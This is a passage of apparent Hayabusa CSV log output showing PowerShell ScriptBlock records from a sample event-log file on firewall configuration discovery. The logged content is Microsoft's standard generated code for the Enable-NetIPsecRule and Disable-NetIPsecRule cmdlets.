[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 